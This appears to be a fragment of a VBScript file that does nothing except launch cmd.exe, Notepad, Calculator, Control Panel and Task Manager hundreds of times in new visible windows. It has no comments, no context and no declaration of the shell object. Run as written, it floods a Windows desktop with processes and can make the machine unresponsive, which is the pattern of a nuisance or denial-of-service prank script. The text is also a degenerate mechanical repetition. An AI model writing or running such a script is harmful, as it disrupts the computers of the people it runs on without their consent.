objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
